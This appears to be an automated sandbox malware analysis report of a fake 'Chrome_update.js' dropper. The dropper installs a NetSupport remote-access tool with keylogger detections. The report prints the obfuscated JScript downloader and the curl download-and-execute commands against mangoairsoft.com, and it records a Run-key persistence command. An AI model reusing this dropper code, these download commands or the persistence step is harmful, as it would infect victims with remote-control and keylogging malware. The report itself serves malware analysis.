                                                            2023-08-02 08:13:04 UTC2767INData Raw: 00 00 3a 53 47 00 06 00 00 00 44 53 47 00 0b 00 00 00 4c 53 47 00 0b 00 00 00 54 53 47 00 06 00 00 00 5c 53 47 00 06 00 00 00 66 53 47 00 0f 00 00 00 6e 53 47 00 10 00 00 00 76 53 47 00 06 00 00 00 7e 53 47 00 06 00 00 00 88 53 47 00 13 00 00 00 90 53 47 00 14 00 00 00 98 53 47 00 14 00 00 00 a2 53 47 00 20 05 93 19 02 00 00 00 78 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b4 53 47 00 00 00 00 00 bf 53 47 00 20 05 93 19 02 00 00 00 a8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff d4 53 47 00 ff ff ff ff df 53 47 00 20 05 93 19 01 00 00 00 d8 0d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f4 53 47 00 20 05 93 19 01 00 00 00 00 0e 48 00 00 00 00 00 00
                                                            Data Ascii: :SGDSGLSGTSG\SGfSGnSGvSG~SGSGSGSGSG xHSGSG HSGSG HSG H
                                                            2023-08-02 08:13:04 UTC2783INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 9c 7a 47 00 20 05 93 19 06 00 00 00 28 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff b0 7a 47 00 00 00 00 00 b8 7a 47 00 01 00 00 00 c3 7a 47 00 02 00 00 00 ce 7a 47 00 03 00 00 00 d9 7a 47 00 04 00 00 00 e4 7a 47 00 20 05 93 19 02 00 00 00 78 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff f8 7a 47 00 00 00 00 00 03 7b 47 00 20 05 93 19 01 00 00 00 a8 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 18 7b 47 00 20 05 93 19 04 00 00 00 d0 4d 48 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 30 7b 47 00 00 00 00 00 38 7b 47 00 01 00 00 00 43 7b 47 00 02 00 00 00 4e 7b 47 00 20
                                                            Data Ascii: zG (MHzGzGzGzGzGzG xMHzG{G MH{G MH0{G8{GC{GN{G
                                                            2023-08-02 08:13:04 UTC2799INData Raw: 6d 70 61 72 65 46 69 6c 65 54 69 6d 65 00 bc 00 46 69 6c 65 54 69 6d 65 54 6f 53 79 73 74 65 6d 54 69 6d 65 00 00 bb 01 47 65 74 53 79 73 74 65 6d 49 6e 66 6f 00 fa 01 47 6c 6f 62 61 6c 4d 65 6d 6f 72 79 53 74 61 74 75 73 00 00 77 01 47 65 74 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 41 00 00 88 00 44 6f 73 44 61 74 65 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 ba 00 46 69 6c 65 54 69 6d 65 54 6f 44 6f 73 44 61 74 65 54 69 6d 65 00 4e 03 53 79 73 74 65 6d 54 69 6d 65 54 6f 46 69 6c 65 54 69 6d 65 00 00 be 01 47 65 74 53 79 73 74 65 6d 54 69 6d 65 00 83 03 57 61 69 74 46 6f 72 4d 75 6c 74 69 70 6c 65 4f 62 6a 65 63 74 73 00 00 73 02 4f 70 65 6e 45 76 65 6e 74 41 00 00 65 03 55 6e 6d 61 70 56 69 65 77 4f 66 46 69 6c 65 00 5e 02 4d 61 70 56 69 65 77 4f 66 46 69
                                                            Data Ascii: mpareFileTimeFileTimeToSystemTimeGetSystemInfoGlobalMemoryStatuswGetModuleHandleADosDateTimeToFileTimeFileTimeToDosDateTimeNSystemTimeToFileTimeGetSystemTimeWaitForMultipleObjectssOpenEventAeUnmapViewOfFile^MapViewOfFi
                                                            2023-08-02 08:13:04 UTC2815INData Raw: 00 00 00 00 00 00 42 00 43 00 4a 00 32 00 00 00 00 00 00 00 00 00 e0 58 44 00 60 59 44 00 03 01 03 03 00 00 00 00 28 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 42 00 43 00 4a 00 00 00 90 5b 44 00 c0 5b 44 00 05 02 03 03 00 00 00 00 fc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 e0 5b 44 00 00 5c 44 00 01 04 03 03 00 00 00 00 f0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 20 5c 44 00 40 5c 44 00 01 05 03 03 00 00 00 00 e8 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 60 5c 44 00 80 5c 44 00 01 07 03 03 00 00 00 00 dc d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 a0 5c 44 00 c0 5c 44 00 05 08 03 03 00 00 00 00 d0 d9 48 00 01 00 00 00 01 00 00 00 00 00 00 00 53 00 50 00 41 00 52 00 43 00 00 00 41 00 52 00 4d 00 54 00 00 00 00 00 41 00 52 00 4d 00 00 00 49
                                                            Data Ascii: BCJ2XD`YD(HBCJ[D[DH[D\DH \D@\DH`\D\DH\D\DHSPARCARMTARMI


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.349701188.127.230.147443C:\Windows\System32\wscript.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2023-08-02 08:13:05 UTC2830OUTGET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat HTTP/1.1
                                                            Host: mangoairsoft.com
                                                            User-Agent: curl/7.55.1
                                                            Accept: */*
                                                            2023-08-02 08:13:05 UTC2830INHTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 02 Aug 2023 08:13:05 GMT
                                                            Content-Type: application/x-msdos-program
                                                            Content-Length: 532
                                                            Connection: close
                                                            Last-Modified: Thu, 27 Jul 2023 14:27:39 GMT
                                                            ETag: "214-60178c42f5f39"
                                                            Accept-Ranges: bytes
                                                            2023-08-02 08:13:05 UTC2830INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 0d 0a 3a 3a 20 73 73 52 73 67 73 33 73 67 73 62 67 73 67 67 73 67 73 33 67 73 67 73 33 73 33 5a 36 0d 0a 3a 3a 20 73 73 52 62 5a 67 73 36 67 73 67 73 33 32 36 66 73 73 52 62 0d 0a 0d 0a 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 78 63 6f 70 79 20 2f 68 20 2f 79 20 37 7a 7a 2e 65 78 65 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 63 6d 64 20 2f 63 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 37 7a 7a 2e 65 78 65 20 78 20 2d 79 20 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 6c 6f 6c 6f 2e 37 7a 20 20 2d 6f 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 20 26 26 20 54 49 4d 45 4f 55 54 20 2f 54 20 37 20 26 26 20 73 74 61 72 74 20 2f 62 20 2f 6d 69 6e 20 63 6d 64 20 2f
                                                            Data Ascii: @echo off:: ssRsgs3sgsbgsggsgs3gsgs3s3Z6:: ssRbZgs6gsgs326fssRbstart /b /min xcopy /h /y 7zz.exe C:\ProgramData\ && start /b /min cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\ && TIMEOUT /T 7 && start /b /min cmd /


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:10:12:59
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Chrome_update.js"
                                                            Imagebase:0x7ff774540000
                                                            File size:163'840 bytes
                                                            MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:1
                                                            Start time:10:13:01
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat
                                                            Imagebase:0x7ff707bb0000
                                                            File size:273'920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:2
                                                            Start time:10:13:01
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff745070000
                                                            File size:625'664 bytes
                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:3
                                                            Start time:10:13:01
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c C:\ProgramData\sett.bat"
                                                            Imagebase:0x7ff707bb0000
                                                            File size:273'920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Target ID:4
                                                            Start time:10:13:01
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\curl.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lolo.7z" -o "C:\ProgramData\lolo.7z"
                                                            Imagebase:0x7ff741190000
                                                            File size:424'448 bytes
                                                            MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate

                                                            General

                                                            Target ID:5
                                                            Start time:10:13:02
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c C:\ProgramData\7z.bat"
                                                            Imagebase:0x7ff707bb0000
                                                            File size:273'920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:6
                                                            Start time:10:13:03
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\curl.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
                                                            Imagebase:0x7ff741190000
                                                            File size:424'448 bytes
                                                            MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:7
                                                            Start time:10:13:04
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c C:\ProgramData\qweq.bat"
                                                            Imagebase:0x7ff707bb0000
                                                            File size:273'920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:8
                                                            Start time:10:13:04
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\curl.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:curl -k "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/22.bat" -o "C:\ProgramData\qweq.bat"
                                                            Imagebase:0x7ff741190000
                                                            File size:424'448 bytes
                                                            MD5 hash:BDEBD2FC4927DA00EEA263AF9CF8F7ED
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:9
                                                            Start time:10:13:05
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                                            Imagebase:0x7ff686a60000
                                                            File size:72'704 bytes
                                                            MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:10
                                                            Start time:10:13:05
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                                            Imagebase:0x7ff686a60000
                                                            File size:72'704 bytes
                                                            MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:11
                                                            Start time:10:13:05
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd.exe /c C:\ProgramData\qweq.bat"
                                                            Imagebase:0x7ff707bb0000
                                                            File size:273'920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:12
                                                            Start time:10:13:05
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\xcopy.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:xcopy /h /y 7zz.exe C:\ProgramData\
                                                            Imagebase:0x7ff746ee0000
                                                            File size:47'616 bytes
                                                            MD5 hash:6BC7DB1465BEB7607CBCBD7F64007219
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:13
                                                            Start time:10:13:05
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                                            Imagebase:0x7ff707bb0000
                                                            File size:273'920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:14
                                                            Start time:10:13:05
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\timeout.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:TIMEOUT /T 7
                                                            Imagebase:0x7ff7a54a0000
                                                            File size:30'720 bytes
                                                            MD5 hash:EB9A65078396FB5D4E3813BB9198CB18
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:15
                                                            Start time:10:13:05
                                                            Start date:02/08/2023
                                                            Path:C:\ProgramData\7zz.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\ProgramData\7zz.exe x -y C:\ProgramData\lolo.7z -oC:\ProgramData\
                                                            Imagebase:0x400000
                                                            File size:587'776 bytes
                                                            MD5 hash:42BADC1D2F03A8B1E4875740D3D49336
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.399920793.0000000002836000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.399920793.0000000002366000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000F.00000003.399920793.0000000002491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 0%, ReversingLabs

                                                            General

                                                            Target ID:16
                                                            Start time:10:13:12
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:cmd /c C:\ProgramData\client32.exe
                                                            Imagebase:0x7ff707bb0000
                                                            File size:273'920 bytes
                                                            MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:17
                                                            Start time:10:13:12
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                                            Imagebase:0x7ff686a60000
                                                            File size:72'704 bytes
                                                            MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:18
                                                            Start time:10:13:12
                                                            Start date:02/08/2023
                                                            Path:C:\ProgramData\client32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\ProgramData\client32.exe
                                                            Imagebase:0x240000
                                                            File size:101'680 bytes
                                                            MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000000.412323829.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000003.427318962.000000000176A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.910328086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000003.427594284.000000000177D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000003.427449828.0000000001775000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000003.416840178.0000000001746000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.909682872.00000000036A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000003.425047789.0000000001773000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.909682872.000000000368F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000003.425987309.000000000177D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000003.427734474.000000000177E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.908996646.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.911218800.000000006F080000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000012.00000002.910282080.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\client32.exe, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 12%, ReversingLabs

                                                            General

                                                            Target ID:19
                                                            Start time:10:13:12
                                                            Start date:02/08/2023
                                                            Path:C:\Windows\System32\reg.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "CachedX" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                                            Imagebase:0x7ff686a60000
                                                            File size:72'704 bytes
                                                            MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language

                                                            General

                                                            Target ID:22
                                                            Start time:10:13:17
                                                            Start date:02/08/2023
                                                            Path:C:\ProgramData\client32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\ProgramData\client32.exe"
                                                            Imagebase:0x240000
                                                            File size:101'680 bytes
                                                            MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000002.424787693.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000000.422585453.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000002.424736480.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000016.00000002.424059492.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security

                                                            General

                                                            Target ID:23
                                                            Start time:10:13:25
                                                            Start date:02/08/2023
                                                            Path:C:\ProgramData\client32.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\ProgramData\client32.exe"
                                                            Imagebase:0x240000
                                                            File size:101'680 bytes
                                                            MD5 hash:F70B67C2B3204B7DDD8B755799CCCFF0
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000017.00000002.442479428.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000017.00000000.440898927.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000017.00000002.441826424.0000000000242000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000017.00000002.442419943.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                            Disassembly

                                                            Code Analysis

                                                            Call Graph

                                                            • Executed
                                                            • Not Executed
                                                            callgraph clusterC0 clusterC2C0 clusterC16C2 clusterC18C2 clusterC4C0 clusterC6C4 clusterC8C6 clusterC10C6 clusterC12C6 clusterC14C6 clusterC20C0 E1C0 entry:C0 F17C16 open E1C0->F17C16 F19C18 send E1C0->F19C18 F21C20 ActiveXObject E1C0->F21C20 F3C2 ActiveXObject() F5C4 F9C8 open F5C4->F9C8 F11C10 write F5C4->F11C10 F13C12 saveToFile F5C4->F13C12 F15C14 close F5C4->F15C14 F7C6 ActiveXObject()

                                                            Script:

                                                            Code
                                                            0
                                                            var jnupBjcczdjwhBvkxI = new ActiveXObject ( "MS" + "XML2.XMLHTT" + "" + "" + "" + "P" );
                                                              1
                                                              jnupBjcczdjwhBvkxI[( "onreadystat" + "echa" + "n" + "g" + "e" )] =
                                                                2
                                                                function () {
                                                                • open("GET","https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?81197",false) ➔ undefined
                                                                • send() ➔ undefined
                                                                3
                                                                if ( jnupBjcczdjwhBvkxI[( "readySta" + "t" + "" + "e" )] === ( 15763 - 15759 ) )
                                                                  4
                                                                  {
                                                                    5
                                                                    var pLSPCTVWYfGWPHTjkuePySUPiXvRQUDBwU = new ActiveXObject ( "ADOD" + "B.Str" + "e" + "a" + "" + "" + "" + "" + "" + "" + "" + "m" );
                                                                      6
                                                                      pLSPCTVWYfGWPHTjkuePySUPiXvRQUDBwU.open ( );
                                                                      • open() ➔ undefined
                                                                      7
                                                                      pLSPCTVWYfGWPHTjkuePySUPiXvRQUDBwU.type = ( 11248 - 11247 );
                                                                        8
                                                                        pLSPCTVWYfGWPHTjkuePySUPiXvRQUDBwU.write ( jnupBjcczdjwhBvkxI[( "ResponseB" + "od" + "y" )] );
                                                                        • write() ➔ undefined
                                                                        9
                                                                        pLSPCTVWYfGWPHTjkuePySUPiXvRQUDBwU.position = ( 73020 - 73020 );
                                                                          10
                                                                          pLSPCTVWYfGWPHTjkuePySUPiXvRQUDBwU.saveToFile ( "C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat", ( 24454 - 24452 ) );
                                                                          • saveToFile("C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat",2) ➔ undefined
                                                                          11
                                                                          pLSPCTVWYfGWPHTjkuePySUPiXvRQUDBwU.close ( );
                                                                          • close() ➔ undefined
                                                                          12
                                                                          }
                                                                            13
                                                                            };
                                                                              14
                                                                              jnupBjcczdjwhBvkxI.open ( "G" + "E" + "" + "" + "" + "T", "https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee" + "6e9" + "ec29f8c1/11.b" + "at?8119" + "7", false );
                                                                              • open("GET","https://mangoairsoft.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/11.bat?81197",false) ➔ undefined
                                                                              15
                                                                              jnupBjcczdjwhBvkxI.send ( );
                                                                              • send() ➔ undefined
                                                                              16
                                                                              GIUrHaOOHM = ActiveXObject ( "new:{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}" );
                                                                              • ActiveXObject("new:{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}") ➔
                                                                              17
                                                                              EdeeTZToadxOQEb = ( "cmd /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat" );
                                                                                18
                                                                                GIUrHaOOHM["RU" + "N"] ( EdeeTZToadxOQEb, 0, true );
                                                                                • RUN("cmd /c C://ProgramData//xcpCFFjZKLTFFLZfvqyQQKBvqwD.bat",0,true) ➔ 0
                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:6.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:10.5%
                                                                                  Total number of Nodes:1235
                                                                                  Total number of Limit Nodes:15
